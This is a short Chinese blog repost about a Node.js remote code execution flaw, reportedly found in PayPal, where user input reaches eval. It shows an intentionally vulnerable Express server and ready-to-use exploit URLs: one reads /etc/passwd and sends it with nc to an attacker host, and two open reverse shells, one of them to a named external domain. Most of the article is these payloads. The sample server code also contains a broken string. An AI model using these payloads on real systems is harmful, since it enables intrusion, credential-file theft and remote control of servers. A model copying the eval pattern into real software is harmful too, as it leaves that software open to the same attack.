服务器 NodeJs

NodeJS远程代码执行

Posted in NodeJs onAugust 28, 2016

背景

@Artsploit在挖PayPal的漏洞时，发现一处NodeJS代码执行，奖励$10000美金。

测试

var express = require('express'); 
var app = express(); 
app.get('/', function (req, res) { 
  res.send('Hello eval(req.query.q));
  console.log(req.query.q);
});
app.listen(8080, function () { 
  console.log('Example listening on port 8080!');
});

任意文件读取

http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

GET SHELL2

http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')

NodeJS远程代码执行

- Author -

hebedich

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

NodeJs 相关文章推荐

Nodejs极简入门教程（三）：进程

Oct 27 NodeJs

轻松创建nodejs服务器（6）：作出响应

Dec 18 NodeJs

轻松创建nodejs服务器（8）：非阻塞是如何实现的

Dec 18 NodeJs

Windows系统中安装nodejs图文教程

Feb 28 NodeJs

Nodejs Stream 数据流使用手册

Apr 17 NodeJs

详解Nodejs基于mongoose模块的增删改查的操作

Dec 21 NodeJs

angular2+nodejs实现图片上传功能

Mar 27 NodeJs

NodeJs模拟登陆正方教务

Apr 28 NodeJs

nodejs之get/post请求的几种方式小结

Jul 26 NodeJs

nodejs创建简易web服务器与文件读写的实例

Sep 07 NodeJs

深入理解NodeJS 多进程和集群

Oct 17 NodeJs

NodeJS读取分析Nginx错误日志的方法

May 14 NodeJs

用NodeJS实现批量查询地理位置的经纬度接口

Aug 16 #NodeJs

使用nodejs中httpProxy代理时候出现404异常的解决方法

Aug 15 #NodeJs

NodeJs的优势和适合开发的程序

Aug 14 #NodeJs

在windows上用nodejs搭建静态文件服务器的简单方法

Aug 11 #NodeJs

Nodejs抓取html页面内容（推荐）

Aug 11 #NodeJs

用nodejs的实现原理和搭建服务器(动态)

Aug 10 #NodeJs

nodejs如何获取时间戳与时间差

Aug 03 #NodeJs

You might like

人大复印资料处理程序_查询篇

2006/10/09 PHP

如何使用php输出时间格式

2013/08/31 PHP

PHP如何通过date() 函数格式化显示时间

2020/11/13 PHP

javascript动画效果类封装代码

2007/08/28 Javascript

为JavaScript添加重载函数的辅助方法

2010/07/04 Javascript

关于document.cookie的使用javascript

2010/10/29 Javascript

使用jQuery实现dropdownlist的联动效果(sharepoint 2007)

2011/03/30 Javascript

javascript教程:关于if简写语句优化的方法

2014/05/17 Javascript

js父页面与子页面不同时显示的方法

2014/10/16 Javascript

使用FlexiGrid实现Extjs表格效果方法分享

2014/12/16 Javascript

angularjs $http实现form表单提交示例

2017/06/09 Javascript

javascript按顺序加载运行js方法

2017/12/01 Javascript

深入理解JavaScript 中的匿名函数((function() {})();)与变量的作用域

2018/08/28 Javascript

vue element-ui之怎么封装一个自己的组件的详解

2019/05/20 Javascript

基于jquery实现的tab选项卡功能示例【附源码下载】

2019/06/10 jQuery

ES6实现图片切换特效代码

2020/01/14 Javascript

vue-router 路由传参用法实例分析

2020/03/06 Javascript

vue使用echarts实现水平柱形图实例

2020/09/09 Javascript

Python中用startswith()函数判断字符串开头的教程

2015/04/07 Python

Python实现批量下载文件

2015/05/17 Python

解决python3在anaconda下安装caffe失败的问题

2017/06/15 Python

PyQt5每天必学之创建窗口居中效果

2018/04/19 Python

python如何获取列表中每个元素的下标位置

2019/07/01 Python

pytorch模型预测结果与ndarray互转方式

2020/01/15 Python

沙特阿拉伯电子产品和家用电器购物网站：Black Box

2019/07/24 全球购物

C#中有没有运算符重载？能否使用指针？

2014/05/05 面试题

我的大学生活职业生涯规划

2014/01/02 职场文书

端午节粽子促销活动方案

2014/02/02 职场文书

政法学院毕业生求职信

2014/02/28 职场文书

个人投资计划书

2014/05/01 职场文书

材料化学专业求职信

2014/07/15 职场文书

公司外出活动方案

2014/08/14 职场文书

中小学校园安全广播稿

2014/09/29 职场文书

党员对照检查剖析材料

2014/10/13 职场文书

英文自荐信范文

2015/03/25 职场文书

Centos系统通过Docker安装并搭建MongoDB数据库

2022/04/12 MongoDB